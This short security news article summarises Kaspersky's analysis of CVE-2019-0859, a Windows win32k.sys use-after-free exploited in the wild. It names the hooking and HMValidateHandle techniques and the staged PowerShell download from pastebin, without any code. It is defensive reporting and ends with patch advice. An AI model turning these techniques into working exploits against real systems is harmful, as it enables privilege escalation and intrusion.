CVE-2019-0859 is a zero-day vulnerability which was part of this month‘s Patch Tuesday. The vulnerability was detected by Kaskersky Lab researchers who just released detailed technical resume of the issue.
In March 2019, Kaspersky’s Exploit Prevention (EP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to the discovery of a zero-day flaw located in win32k.sys. It was the fifth consecutive exploited Local Privilege Escalation vulnerability in Windows discovered by the same team in the past several months, the researchers said.
CVE-2019-0859 Technical Details
Shortly said, CVE-2019-0859 is a Use-After-Free flaw located in the system function that handles dialog windows and their additional styles. The exploit pattern the researchers came across in the wild targeted 64-bit versions of the operating systems, ranging from Windows 7 to the latest builds of Windows 10. Note that exploitation of the vulnerability allows the malware to download and execute a script written by the attackers. The worst case scenario of this exploit is gaining full control of infected systems.
In detail, upon execution CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created, the researchers explained. By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before calling the window procedure.
Furthermore, the bug is related to Function ID:
In win32k.sys all windows are presented by the tagWND structure which has an “fnid” field also known as Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others.
The exploit the researchers discovered in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10). The flaw was leveraged by using the well-known HMValidateHandle technique utilized to bypass ASLR.
After a successful exploitation, PowerShell was executed with a Base64 encoded command. The sole purpose of the command was to download a second-stage script from https//pastebin.com. The second stage PowerShell executed the final third stage, which was also a PowerShell script.
Users should install the update addressing CVE-2019-0859 to avoid any exploitation.